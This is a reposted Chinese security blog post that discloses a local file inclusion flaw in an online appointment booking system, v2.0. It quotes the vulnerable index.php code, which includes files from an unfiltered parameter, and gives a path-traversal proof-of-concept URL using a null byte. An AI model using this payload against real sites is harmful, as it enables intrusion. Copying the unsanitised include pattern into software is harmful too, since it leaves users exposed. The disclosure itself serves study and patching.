网上在线挂号预约管理系统 v2.0 本地包含漏洞

admin
admin
admin
101400
文章
87
评论
2021年4月3日20:08:14评论70 views字数 900阅读3分0秒阅读模式

看到各位大牛为了为了版主拼命挖洞,不知不觉带动了偶熄灭已久的基情。

在网上查了下,貌似没有这个程序的漏洞信息,就发出来交流学习,反正偶也要洞木有用。

在网上随便找了下,漏洞很简单,只为了学习与交流。大牛飘过。看如下代码:

Index.php:

@extract($_GET,EXTR_PREFIX_ALL,"g");    //所有提交函数加前缀g,提交o就变成g_o
if(isset($_POST['submit']) || isset($g_submit)){
  @check_post_request();
  @extract($_POST,EXTR_PREFIX_ALL,"p");
}  //如果post有数据 先检查,然后赋值。

session_cache_limiter('private,must-revalidate');
if(!isset($_SESSION)){
  session_start();
}
$db = new c_mysql;
$g_m = (isset($g_m) && in_array_key($g_m,$config['model'])) ? $g_m : 'login';
$g_o = isset($g_o) ? $g_o : '';   //木有过滤
….
….

$operate_file = 'model/'.$g_m."_".$g_o.".php";
if(file_exists($operate_file))   //如果存在就包含
  include($operate_file);

create_html();
?>

由于搭建失败,我是直接看代码未测试。给出测试代码:

http://127.0.0.1/index.php?o=/../../1.php%00

文章来源于lcx.cc:网上在线挂号预约管理系统 v2.0 本地包含漏洞

相关推荐: 美核武专家称朝鲜可能已研制出电磁脉冲武器

电磁脉冲武器(资料图片)   中新网6月24日电 据韩联社援引美国媒体24日报道,美国核武专家认为朝鲜有可能成功研制了电磁脉冲(EMP)武器。   EMP是核武在高空爆炸时产生的超强电磁场(俗称电磁脉冲),会对用电设备或电子设备发生耦合,并产生具破坏性的电流和…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:08:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网上在线挂号预约管理系统 v2.0 本地包含漏洞http://cn-sec.com/archives/325684.html

发表评论

匿名网友 填写信息